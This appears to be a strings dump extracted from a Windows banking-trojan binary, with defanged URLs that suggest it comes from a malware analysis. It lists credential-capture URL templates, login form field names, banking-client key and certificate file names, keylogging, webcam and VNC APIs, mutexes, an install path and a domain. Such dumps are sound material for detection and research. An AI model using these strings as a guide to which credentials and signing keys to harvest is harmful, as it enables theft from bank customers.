%s.dbf
%s.DBF
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
AUTHINFO PASS
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
ssleay32.dll
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
#webcam
#webcam%d
RFB d.d
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
WinExec
SetThreadExecutionState
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetAsyncKeyState
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
VkKeyScanExW
keybd_event
EnumChildWindows
ActivateKeyboardLayout
SetKeyboardState
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegNotifyChangeKeyValue
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
gdiplus.dll
MSVCRT.dll
AVICAP32.dll
MSVFW32.dll
ShellExecuteW
GetProcessHeap
SYSTEM!XP7!F9BE9A8A
%WinDir%\apppatch\vkyeif.exe
%Documents and Settings%\%current user%\Application Data\
`.data
Windows Explorer
mavast.com
ya.ru
serverkey.dat
\windows\
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
.Prev
.current